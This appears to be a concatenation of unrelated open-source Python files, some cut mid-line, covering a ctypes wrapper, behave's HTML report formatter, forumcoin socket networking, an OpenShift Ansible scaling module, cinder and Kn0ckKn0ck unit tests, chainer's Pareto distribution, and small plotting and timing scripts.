elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(ptr, value):
cstring = ctypes.create_string_buffer(value.encode('utf-8'), strlen)
cvalue = ctypes.cast(cstring, ctypes.c_char_p)
cfunc(ptr, ctypes.byref(cvalue))
return _set
else:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(ptr, value):
cvalue = ctype(value)
cfunc(ptr, ctypes.byref(cvalue))
return _set
def _allocator(ctype, cfunc):
if cfunc is None:
return None
cfunc.argtypes = [ctypes.c_void_p]
cfunc.restype = None
return cfunc
class Field(object):
def __init__(self, ctype, getter, setter=None, allocator=None, strlen=None):
self.ctype = ctype
self.getter = _getter(ctype, getter)
self.setter = _setter(ctype, setter, strlen)
self.allocator = _allocator(ctype, allocator)
def __get__(self, instance, owner):
if instance is None:
return self
try:
return self.getter(instance.ptr)
except NullPointerError:
self.allocator(instance.ptr)
return self.getter(instance.ptr)
def __set__(self, instance, value):
if self.setter:
self.setter(instance.ptr, value)
elif issubclass(self.ctype, FType):
try:
target = self.getter(instance.ptr)
except NullPointerError:
self.allocator(instance.ptr)
target = self.getter(instance.ptr)
target.copy_from(value)
else:
raise AttributeError("Not settable.")
def _global_getter(ctype, cfunc):
if issubclass(ctype, FType):
cfunc.argtypes = []
cfunc.restype = ctypes.c_void_p
def _get():
cptr = cfunc()
if cptr is None:
raise NullPointerError()
return ctype(ctypes.c_void_p(cptr), False)
return _get
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.POINTER(ctypes.c_char_p)]
cfunc.restype = None
        def _get():
cptr = ctypes.c_char_p(0)
cfunc(ctypes.byref(cptr))
return cptr.value.decode('utf-8').rstrip()
return _get
else:
cfunc.argtypes = []
cfunc.restype = ctype
return cfunc
def _global_setter(ctype, cfunc, strlen=None):
if cfunc is None:
return None
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(value):
cstring = ctypes.create_string_buffer(value.encode('utf-8'), strlen)
cvalue = ctypes.cast(cstring, ctypes.c_char_p)
cfunc(ctypes.byref(cvalue))
return _set
else:
cfunc.argtypes = [ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(value):
cvalue = ctype(value)
cfunc(ctypes.byref(cvalue))
return _set
def _global_allocator(ctype, cfunc):
if cfunc is None:
return None
cfunc.argtypes = []
cfunc.restype = None
return cfunc
class Global(Field):
def __init__(self, ctype, getter, setter=None, allocator=None, strlen=None):
self.ctype = ctype
self.getter = _global_getter(ctype, getter)
self.setter = _global_setter(ctype, setter, strlen)
self.allocator = _global_allocator(ctype, allocator)
def __get__(self, instance, owner):
if instance is None:
return self
try:
return self.getter()
except NullPointerError:
self.allocator()
return self.getter()
def __set__(self, instance, value):
if self.setter:
self.setter(value)
eli
kymbert/behave | behave/formatter/html.py | Python | bsd-2-clause | 15,092 | 0.001789
# -*- coding: utf-8 -*-
"""
Creates a very basic one-page html file for reporting a test run.
"""
from __future__ import absolute_import
from behave.formatter.base import Formatter
from behave.formatter.css import BasicTheme
from behave.compat.collections import Counter
import xml.etree.ElementTree as ET
import base64
def _valid_XML_char_ordinal(i):
return ( # conditions ordered by presumed frequency
0x20 <= i <= 0xD7FF
or i in (0x9, 0xA, 0xD)
or 0xE000 <= i <= 0xFFFD
or 0x10000 <= i <= 0x10FFFF
)
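# Editor's note: a typical (assumed) use of the predicate above is stripping
# characters that are illegal in XML 1.0 before handing text to ElementTree:
#   clean = u''.join(c for c in text if _valid_XML_char_ordinal(ord(c)))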
def ET_tostring(elem, pretty_print=False):
text = ET.tostring(elem, "utf-8")
if pretty_print:
pass
return text
class JavaScriptLibrary(object):
collapsible = """
function collapsible_toggle(id)
{
var elem = document.getElementById(id);
elem.style.display = (elem.style.display == 'none' ? 'block' : 'none');
return false;
}
function collapsible_expandAll(className)
{
var elems = document.getElementsByClassName(className);
var i = 0;
while (i != elems.length)
{
elems[i].style.display = 'block';
i++
}
}
function collapsible_collapseAll(className)
{
var elems = document.getElementsByClassName(className);
var i = 0;
while (i != elems.length)
{
elems[i].style.display = 'none';
i++
}
}
"""
class Page(object):
"""
Provides a HTML page construct (as technological layer).
XXX
"""
theme = BasicTheme
def __init__(self, title=None):
pass
# -----------------------------------------------------------------------------
# CLASS: HTMLFormatter
# -----------------------------------------------------------------------------
class HTMLFormatter(Formatter):
"""
Provides a single-page HTML formatter that writes the result of a test run.
"""
name = 'html'
description = 'Basic HTML formatter'
title = u"Behave Test Report"
def __init__(self, stream_opener, config):
        super(HTMLFormatter, self).__init__(stream_opener, config)
# -- XXX-JE-PREPARED-BUT-DISABLED:
# XXX Seldom changed value.
# XXX Should only be in configuration-file in own section "behave.formatter.html" ?!?
# XXX Config support must be provided.
# XXX REASON: Don't clutter behave config-space w/ formatter/plugin related config data.
# self.css = self.default_css
# if config.css is not None:
# self.css = config.css
self.html = ET.Element('html')
head = ET.SubElement(self.html, 'head')
ET.SubElement(head, 'title').text = self.title
ET.SubElement(head, 'meta', {'content': 'text/html;charset=utf-8'})
style = ET.SubElement(head, 'style', type=u"text/css")
style.text = Page.theme.stylesheet_text
# style.append(ET.Comment(Page.theme.stylesheet_text))
script = ET.SubElement(head, 'script', type=u"text/javascript")
script.text = JavaScriptLibrary.collapsible
# script_text = ET.Comment(JavaScriptLibrary.collapsible)
# script.append(script_text)
self.stream = self.open()
body = ET.SubElement(self.html, 'body')
self.suite = ET.SubElement(body, 'div', {'class': 'behave'})
#Summary
self.header = ET.SubElement(self.suite, 'div', id='behave-header')
label = ET.SubElement(self.header, 'div', id='label')
ET.SubElement(label, 'h1').text = self.title
summary = ET.SubElement(self.header, 'div', id='summary')
totals = ET.SubElement(summary, 'p', id='totals')
self.current_feature_totals = ET.SubElement(totals, 'p', id='feature_totals')
self.scenario_totals = ET.SubElement(totals, 'p', id='scenario_totals')
self.step_totals = ET.SubElement(totals, 'p', id='step_totals')
self.duration = ET.SubElement(summary, 'p', id='duration')
# -- PART: Expand/Collapse All
expand_collapse = ET.SubElement(summary, 'div', id='expand-collapse')
expander = ET.SubElement(expand_collapse, 'a', id='expander', href="#")
expander.set('onclick', "collapsible_expandAll('scenario_steps')")
expander.text = u'Expand All'
cea_spacer = ET.SubElement(expand_collapse, 'span')
cea_spacer.text = u" | "
collapser = ET.SubElement(expand_collapse, 'a', id='collapser', href="#")
collapser.set('onclick', "collapsible_collapseAll('scenario_steps')")
collapser.text = u'Collapse All'
self.embed_id = 0
self.embed_in_this_step = None
self.embed_data = None
self.embed_mime_type = None
self.scenario_id = 0
def feature(self, feature):
if not hasattr(self, "all_features"):
self.all_features = []
self.all_features.append(feature)
self.current_feature = ET.SubElement(self.suite, 'div', {'class': 'feature'})
if feature.tags:
tags_element = ET.SubElement(self.current_feature, 'span', {'class': 'tag'})
tags_element.text = u'@' + reduce(lambda d, x: "%s, @%s" % (d, x), feature.tags)
h2 = ET.SubElement(self.current_feature, 'h2')
feature_element = ET.SubElement(h2, 'span', {'class': 'val'})
feature_element.text = u'%s: %s' % (feature.keyword, feature.name)
if feature.description:
description_element = ET.SubElement(self.current_feature, 'pre', {'class': 'message'})
description_element.text = reduce(lambda d, x: "%s\n%s" % (d, x), feature.description)
def background(self, background):
self.current_background = ET.SubElement(self.suite, 'div', {'class': 'background'})
h3 = ET.SubElement(self.current_background, 'h3')
ET.SubElement(h3, 'span', {'class': 'val'}).text = \
u'%s: %s' % (background.keyword, background.name)
self.steps = ET.SubElement(self.current_background, 'ol')
def scenario(self, scenario):
if scenario.feature not in self.all_features:
self.all_features.append(scenario.feature)
self.scenario_el = ET.SubElement(self.suite, 'div', {'class': 'scenario'})
scenario_file = ET.SubElement(self.scenario_el, 'span', {'class': 'scenario_file'})
scenario_file.text = "%s:%s" % (scenario.location.filename, scenario.location.line)
if scenario.tags:
tags = ET.SubElement(self.scenario_el, 'span', {'class': 'tag'})
tags.text = u'@' + reduce(lambda d, x: "%s, @%s" % (d, x), scenario.tags)
self.scenario_name = ET.SubElement(self.scenario_el, 'h3')
span = ET.SubElement(self.scenario_name, 'span', {'class': 'val'})
span.text = u'%s: %s' % (scenario.keyword, scenario.name)
if scenario.description:
description_element = ET.SubElement(self.scenario_el, 'pre', {'class': 'message'})
description_element.text = reduce(lambda d, x: "%s\n%s" % (d, x), scenario.description)
self.steps = ET.SubElement(self.scenario_el, 'ol',
{'class': 'scenario_steps',
'id': 'scenario_%s' % self.scenario_id})
self.scenario_name.set("onclick",
"collapsible_toggle('scenario_%s')" % self.scenario_id)
self.scenario_id += 1
def scenario_outline(self, outline):
        self.scenario(outline)
self.scenario_el.set('class', 'scenario outline')
def match(self, match):
self.arguments = match.arguments
if match.location:
self.location = "%s:%s" % (match.location.filename, match.location.line)
else:
self.location = "<unknown>"
def step(self, step):
self.arguments = None
self.embed_in_this_step = None
self.last_step = step
def result(self, result):
self.last_step = result
step = ET.SubElement(self.steps, 'li', {'class': 'step %s' % result.status})
step_name = ET.SubElement(step, 'div', {'class': 'step_name'})
keyword = ET.SubElement(step_name, 'span', {'class': 'keyword'})
keyword.text = result.keyword + u' '
if self.argume
zack-bitcoin/forumcoin | networking.py | Python | gpl-3.0 | 1,788 | 0.009508
import socket, subprocess, re, tools, custom
#This file explains how sockets work for networking.
MAX_MESSAGE_SIZE = 60000
def kill_processes_using_ports(ports):
popen = subprocess.Popen(['netstat', '-lpn'],
shell=False,
stdout=subprocess.PIPE)
(data, err) = popen.communicate()
pattern = "^tcp.*((?:{0})).* (?P<pid>[0-9]*)/.*$"
pattern = pattern.format(')|(?:'.join(ports))
prog = re.compile(pattern)
for line in data.split('\n'):
match = re.match(prog, line)
if match:
pid = match.group('pid')
subprocess.Popen(['kill', '-9', pid])
def serve_forever(message_handler_func, PORT, queue):
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', PORT))
server.listen(100)
while True:
client, addr = server.accept()
(ip, port) = addr
data = client.recv(MAX_MESSAGE_SIZE)
#we could insert security checks here
        try:
            data = tools.unpackage(data)
            client.send(tools.package(message_handler_func(data, queue)))
except: pass
def connect(msg, host, port):
if len(msg)<1 or len(msg)>MAX_MESSAGE_SIZE:
print('wrong sized message')
return
s = socket.socket()
try:
s.settimeout(4)
s.connect((str(host), int(port)))
msg['version']=custom.version
s.send(tools.package(msg))
response = s.recv(MAX_MESSAGE_SIZE)
#print(response)
return tools.unpackage(response)
except Exception as e:
#print('THE ERROR WAS: ' +str(e))
#print('disconnect')
return {'error':e}
def send_command(peer, msg): return connect(msg, peer[0], peer[1])
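# Editor's sketch (peer address and message are hypothetical; the wire format
# is whatever tools.package/unpackage implement):
#   response = send_command(('127.0.0.1', 8900), {'type': 'ping'})
#   if 'error' in response:
#       print('peer unreachable')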
sosiouxme/openshift-ansible | roles/lib_openshift/library/oc_scale.py | Python | apache-2.0 | 66,630 | 0.001291
#!/usr/bin/env python
# pylint: disable=missing-docstring
# flake8: noqa: T001
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
#
# Copyright 2016 Red Hat, Inc. and/or its affiliates
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- -*- -*- Begin included fragment: lib/import.py -*- -*- -*-
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
from __future__ import print_function
import atexit
import copy
import fcntl
import json
import time
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
try:
import ruamel.yaml as yaml
except ImportError:
import yaml
from ansible.module_utils.basic import AnsibleModule
# -*- -*- -*- End included fragment: lib/import.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: doc/scale -*- -*- -*-
DOCUMENTATION = '''
---
module: oc_scale
short_description: Manage openshift services through the scale parameters
description:
- Manage openshift services through scaling them.
options:
state:
description:
- State represents whether to scale or list the current replicas
required: true
default: present
choices: ["present", "list"]
aliases: []
kubeconfig:
description:
- The path for the kubeconfig file to use for authentication
required: false
default: /etc/origin/master/admin.kubeconfig
aliases: []
debug:
description:
- Turn on debug output.
required: false
default: False
aliases: []
name:
description:
- Name of the object that is being queried.
required: false
default: None
aliases: []
namespace:
description:
- The namespace where the object lives.
required: false
default: default
aliases: []
kind:
description:
- The kind of object to scale.
required: false
default: None
choices:
- rc
- dc
aliases: []
author:
- "Kenny Woodson <kwoodson@redhat.com>"
extends_documentation_fragment: []
'''
EXAMPLES = '''
- name: scale down a rc to 0
oc_scale:
name: my-replication-controller
kind: rc
namespace: openshift-infra
replicas: 0
- name: scale up a deploymentconfig to 2
oc_scale:
name: php
kind: dc
namespace: my-php-app
replicas: 2
'''
# -*- -*- -*- End included fragment: doc/scale -*- -*- -*-
# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
class YeditException(Exception): # pragma: no cover
''' Exception class for Yedit '''
pass
# pylint: disable=too-many-public-methods,too-many-instance-attributes
class Yedit(object): # pragma: no cover
''' Class to modify yaml files '''
re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z{}/_-]+)"
com_sep = set(['.', '#', '|', ':'])
# pylint: disable=too-many-arguments
def __init__(self,
filename=None,
content=None,
content_type='yaml',
separator='.',
backup_ext=None,
backup=False):
self.content = content
self._separator = separator
self.filename = filename
self.__yaml_dict = content
self.content_type = content_type
self.backup = backup
if backup_ext is None:
self.backup_ext = ".{}".format(time.strftime("%Y%m%dT%H%M%S"))
else:
self.backup_ext = backup_ext
self.load(content_type=self.content_type)
if self.__yaml_dict is None:
self.__yaml_dict = {}
@property
def separator(self):
''' getter method for separator '''
return self._separator
@separator.setter
def separator(self, inc_sep):
''' setter method for separator '''
self._separator = inc_sep
@property
def yaml_dict(self):
''' getter method for yaml_dict '''
return self.__yaml_dict
@yaml_dict.setter
def yaml_dict(self, value):
''' setter method for yaml_dict '''
self.__yaml_dict = value
@staticmethod
def parse_key(key, sep='.'):
'''parse the key allowing the appropriate separator'''
common_separators = list(Yedit.com_sep - set([sep]))
return re.findall(Yedit.re_key.format(''.join(common_separators)), key)
@staticmethod
def valid_key(key, sep='.'):
'''validate the incoming key'''
common_separators = list(Yedit.com_sep - set([sep]))
if not re.match(Yedit.re_valid_key.format(''.join(common_separators)), key):
return False
return True
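    # Editor's note (illustrative): with the default separator '.',
    #   Yedit.parse_key('a.b[0].c')
    # yields roughly [('', 'a'), ('', 'b'), ('0', ''), ('', 'c')] -- the
    # alternating dict-key / list-index pairs walked by remove/add_entry.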
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def remove_entry(data, key, index=None, value=None, sep='.'):
''' remove data at location key '''
if key == '' and isinstance(data, dict):
if value is not None:
data.pop(value)
elif index is not None:
raise YeditException("remove_entry for a dictionary does not have an index {}".format(index))
else:
data.clear()
return True
elif key == '' and isinstance(data, list):
ind = None
if value is not None:
try:
ind = data.index(value)
except ValueError:
return False
elif index is not None:
ind = index
else:
del data[:]
if ind is not None:
data.pop(ind)
return True
if not (key and Yedit.valid_key(key, sep)) and \
isinstance(data, (list, dict)):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
# process last index for remove
# expected list entry
if key_indexes[-1][0]:
if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
del data[int(key_indexes[-1][0])]
return True
# expected dict entry
elif key_indexes[-1][1]:
if isinstance(data, dict):
del data[key_indexes[-1][1]]
return True
@staticmethod
def add_entry(data, key, item=None, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a#b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key:
if isinstance(data, dict) and dict_key in data and data[dict_key]: # noqa: E501
data = data[dict_key]
continue
elif data and not isinstance(data, dict
Valentijn1995/Kn0ckKn0ck | Kn0ckKn0ckTestSuite.py | Python | mit | 1,092 | 0.000916
from unittest import TestLoader, TextTestRunner, TestSuite
from UnitTests.TableTest import TestTable
from UnitTests.DestinationTest import TestDestination
from UnitTests.CSVReaderTest import TestCSVReader
from UnitTests.ProxyExtractorTest import TestProxyExtractor
from UnitTests.NoProtocolTest import TestNoProtocol
from UnitTests.HttpProtocolTest import TestHttpProtocol
from UnitTests.ProxyTest import TestProxy
def run_tests():
suite_list = []
suite_list.append(TestLoader().loadTestsFromTestCase(TestTable))
suite_list.append(TestLoader().loadTestsFromTestCase(TestDestination))
    suite_list.append(TestLoader().loadTestsFromTestCase(TestCSVReader))
    suite_list.append(TestLoader().loadTestsFromTestCase(TestProxyExtractor))
suite_list.append(TestLoader().loadTestsFromTestCase(TestNoProtocol))
suite_list.append(TestLoader().loadTestsFromTestCase(TestHttpProtocol))
suite_list.append(TestLoader().loadTestsFromTestCase(TestProxy))
suite = TestSuite(suite_list)
TextTestRunner(verbosity=2).run(suite)
if __name__ == "__main__":
run_tests()
rakeshmi/cinder | cinder/tests/unit/test_volume_types_extra_specs.py | Python | apache-2.0 | 5,074 | 0
# Copyright (c) 2011 Zadara Storage Inc.
# Copyright (c) 2011 OpenStack Foundation
# Copyright 2011 University of Southern California
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for volume types extra specs code
"""
from cinder import context
from cinder import db
from cinder import test
class VolumeTypeExtraSpecsTestCase(test.TestCase):
def setUp(self):
super(VolumeTypeExtraSpecsTestCase, self).setUp()
self.context = context.get_admin_context()
self.vol_type1 = dict(name="TEST: Regular volume test")
self.vol_type1_specs = dict(vol_extra1="value1",
vol_extra2="value2",
vol_extra3=3)
self.vol_type1['extra_specs'] = self.vol_type1_specs
ref = db.volume_type_create(self.context, self.vol_type1)
self.addCleanup(db.volume_type_destroy, context.get_admin_context(),
self.vol_type1['id'])
self.volume_type1_id = ref.id
for k, v in self.vol_type1_specs.iteritems():
self.vol_type1_specs[k] = str(v)
self.vol_type2_noextra = dict(name="TEST: Volume type without extra")
ref = db.volume_type_create(self.context, self.vol_type2_noextra)
self.addCleanup(db.volume_type_destroy, context.get_admin_context(),
self.vol_type2_noextra['id'])
self.vol_type2_id = ref.id
def test_volume_type_specs_get(self):
expected_specs = self.vol_type1_specs.copy()
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_extra_specs_delete(self):
expected_specs = self.vol_type1_specs.copy()
del expected_specs['vol_extra2']
db.volume_type_extra_specs_delete(context.get_admin_context(),
self.volume_type1_id,
'vol_extra2')
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_extra_specs_update(self):
expected_specs = self.vol_type1_specs.copy()
expected_specs['vol_extra3'] = "4"
db.volume_type_extra_specs_update_or_create(
context.get_admin_context(),
self.volume_type1_id,
dict(vol_extra3=4))
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_extra_specs_create(self):
expected_specs = self.vol_type1_specs.copy()
expected_specs['vol_extra4'] = 'value4'
expected_specs['vol_extra5'] = 'value5'
db.volume_type_extra_specs_update_or_create(
context.get_admin_context(),
self.volume_type1_id,
dict(vol_extra4="value4",
vol_extra5="value5"))
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_get_with_extra_specs(self):
volume_type = db.volume_type_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(volume_type['extra_specs'], self.vol_type1_specs)
volume_type = db.volume_type_get(
context.get_admin_context(),
self.vol_type2_id)
self.assertEqual(volume_type['extra_specs'], {})
def test_volume_type_get_by_name_with_extra_specs(self):
volume_type = db.volume_type_get_by_name(
context.get_admin_context(),
self.vol_type1['name'])
self.assertEqual(volume_type['extra_specs'], self.vol_type1_specs)
volume_type = db.volume_type_get_by_name(
context.get_admin_context(),
self.vol_type2_noextra['name'])
self.assertEqual(volume_type['extra_specs'], {})
def test_volume_type_get_all(self):
expected_specs = self.vol_type1_specs.copy()
types = db.volume_type_get_all(context.get_admin_context())
self.assertEqual(
types[self.vol_type1['name']]['extra_specs'], expected_specs)
self.assertEqual(
types[self.vol_type2_noextra['name']]['extra_specs'], {})
|
ktnyt/chainer
|
chainer/distributions/pareto.py
|
Python
|
mit
| 3,069
| 0
|
import chainer
from chainer.backends import cuda
from chainer import distribution
from chainer.functions.array import where
from chainer.functions.math import exponential
from chainer import utils
class Pareto(distribution.Distribution):
"""Pareto Distribution.
.. math::
f(x) = \\alpha x_m^{\\alpha}(x)^{-(\\alpha+1)},
Args:
scale(:class:`~chainer.Variable` or :ref:`ndarray`): Parameter of
distribution :math:`x_m`.
alpha(:class:`~chainer.Variable` or :ref:`ndarray`): Parameter of
distribution :math:`\\alpha`.
"""
def __init__(self, scale, alpha):
super(Pareto, self).__init__()
self.__scale = chainer.as_variable(scale)
self.__alpha = chainer.as_variable(alpha)
@property
def scale(self):
return self.__scale
@property
def alpha(self):
return self.__alpha
@property
def batch_shape(self):
return self.scale.shape
@property
def entropy(self):
return - exponential.log(self.alpha) + exponential.log(self.scale) \
+ 1. / self.alpha + 1.
    @property
    def event_shape(self):
return ()
@property
def _is_gpu(self):
return isinstance(self.scale.data, cuda.ndarray)
def log_prob(self, x):
x = chainer.as_variable(x)
logp = exponential.log(self.alpha) \
            + self.alpha * exponential.log(self.scale) \
- (self.alpha + 1) * exponential.log(x)
xp = logp.xp
return where.where(
utils.force_array(x.data >= self.scale.data),
logp, xp.array(-xp.inf, logp.dtype))
@property
def mean(self):
mean = (self.alpha * self.scale / (self.alpha - 1))
xp = mean.xp
return where.where(
self.alpha.data > 1,
mean, xp.array(xp.inf, mean.dtype))
def sample_n(self, n):
xp = cuda.get_array_module(self.scale)
if xp is cuda.cupy:
eps = xp.random.pareto(
self.alpha.data, (n,)+self.batch_shape, dtype=self.alpha.dtype)
else:
eps = xp.random.pareto(
self.alpha.data, (n,)+self.batch_shape
).astype(self.alpha.dtype)
noise = self.scale * (eps + 1)
return noise
@property
def support(self):
return '[scale, inf]'
@property
def variance(self):
var = self.scale ** 2 * self.alpha / (self.alpha - 1) ** 2 \
/ (self.alpha - 2)
xp = var.xp
return where.where(
self.alpha.data > 2,
var, xp.array(xp.inf, var.dtype))
@distribution.register_kl(Pareto, Pareto)
def _kl_pareto_pareto(dist1, dist2):
kl = dist2.alpha * (exponential.log(dist1.scale)
- exponential.log(dist2.scale)) \
+ exponential.log(dist1.alpha) - exponential.log(dist2.alpha) \
+ (dist2.alpha - dist1.alpha) / dist1.alpha
xp = kl.xp
return where.where(
dist1.scale.data >= dist2.scale.data,
kl, xp.array(xp.inf, kl.dtype))
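A minimal usage sketch of the Pareto class above, assuming chainer and numpy
are installed; the scale/alpha values and variable names are illustrative only:

import numpy as np
from chainer.distributions.pareto import Pareto

# Hypothetical parameters: x_m = 2, alpha = 3, as 0-d float32 arrays.
dist = Pareto(np.array(2., np.float32), np.array(3., np.float32))
samples = dist.sample_n(5)                      # shape (5,), values >= scale
print(dist.log_prob(np.array(4., np.float32)))  # finite log-density
print(dist.log_prob(np.array(1., np.float32)))  # -inf, below the support
print(dist.mean)                                # alpha*scale/(alpha-1) = 3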
|
SafeW3rd/Ciphers
|
password.py
|
Python
|
mit
| 179
| 0.005587
|
print('What is the password?')
password = input()
if password == 'rosebud':
print('Access granted.')
if password != 'rosebud':
    print('Access denied.')
print('Done.')
|
sunj1/my_pyforms
|
pyforms/Utils/timeit.py
|
Python
|
mit
| 694
| 0.034582
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = "Ricardo Ribeiro"
__credits__ = ["Ricardo Ribeiro"]
__license__ = "MIT"
__version__ = "0.0"
__maintainer__ = "Ricardo Ribeiro"
__email__ = "ricardojvr@gmail.com"
__status__ = "Development"
|
import time
from datetime import datetime, timedelta
def timeit(method):
def timed(*args, **kw):
ts = time.time()
result = method(*args, **kw)
te = time.time()
        time_elapsed = datetime(1, 1, 1) + timedelta(seconds=(te - ts))
        print("%s: %d:%d:%d:%d;%d" % (
            method.__name__, time_elapsed.day - 1, time_elapsed.hour,
            time_elapsed.minute, time_elapsed.second,
            time_elapsed.microsecond))
        return result
return timed
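A small usage sketch of the timeit decorator above; the decorated function,
its sleep duration, and the import path (taken from this file's location) are
illustrative assumptions:

import time
from pyforms.Utils.timeit import timeit

@timeit
def slow_add(a, b):
    time.sleep(0.25)          # simulate a slow computation
    return a + b

slow_add(1, 2)                # prints e.g. "slow_add: 0:0:0:0;250123", returns 3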
|
clancia/TASEP
|
Sequential_TASEP/LinRegCTvsSize.py
|
Python
|
gpl-2.0
| 2,328
| 0.018041
|
import matplotlib.pyplot as plt
import numpy as np
from glob import glob
from scipy import stats
#p = 0.5
e = 0.1
qth = [25,50,75,90]
nomefile = './N*' + '_B*' + '_p=1su2L_e0.0.npy'
nomefile = glob(nomefile)
data = []
N = []
medie = []
mediane = []
massimi = []
perc = []
nomefile.sort(key=lambda x:int(x.split('_')[1][1:]))
'''
This sort is the key; Carlo, you had forgotten the int() and it
did not work!
'''
for f in nomefile:
N.append(2*int(f.split('_')[1][1:]))
data.append(np.load(f))
medie.append(np.mean(data[-1]))
massimi.append(max(data[-1]))
mediane.append(np.median(data[-1]))
perc.append(np.percentile(data[-1], qth))
perc = np.array(perc)
perc = perc.T
xi = np.array(N, dtype=float) - 10
Eslope, Eintercept, Er_value, Ep_value, Estd_err = stats.linregress(xi, medie)
Mslope, Mintercept, Mr_value, Mp_value, Mstd_err = stats.linregress(xi, massimi)
MEDslope, MEDintercept, MEDr_value, MEDp_value, MEDstd_err = stats.linregress(xi, mediane)
fig, (ax, bx, cx) = plt.subplots(ncols=3)
fig.suptitle('Coalescence Times for Parallel TASEP p=1/2L e=0.0', fontsize=18)
Eline = Eslope*xi + Eintercept
MEDline = MEDslope*xi + MEDintercept
Mline = Mslope*xi + Mintercept
ax.plot(N,Eline,'r-',N,medie,'o')
ax.set_ylabel('Mean of Coalescence Times', fontsize=15)
ax.set_xlabel('Number of Sites of the Ring')
ax.text(15,35, 'Slope = %f \nIntercept = %f' %(Eslope, Eintercept), fontsize=16)
bx.plot(N,MEDline,'r-',N,mediane,'x')
bx.set_ylabel('Median of Coalescence Times', fontsize=15)
bx.set_xlabel('Number of Sites of the Ring')
bx.text(15, 15, 'Slope = %f \nIntercept = %f' %(MEDslope, MEDintercept), fontsize=16)
cx.plot(N,Mline,'r-',N,massimi,'g^')
cx.text(15, 1000, 'Slope = %f \nIntercept = %f' %(Mslope, Mintercept), fontsize=16)
cx.set_ylabel('Max of Coalescence Times', fontsize=15)
cx.set_xlabel('Number of Sites of the Ring')
plt.show()
fig = plt.figure()
# for row, lab in zip(perc[::-1],qth[::-1]):
# plt.plot(N,row, label=lab)
# '''
# I used the extended slice syntax only to get the legend in descending order
# '''
# plt.legend(loc=2, title= 'Percentiles')
# plt.ylabel('Values of Percentiles of Coalescence Times')
# plt.xlabel('Number of Sites of the Ring')
# plt.title('Percentiles of Coealescence Times of Parallel TASEP p0.5 e0.1')
# plt.show(fig)
|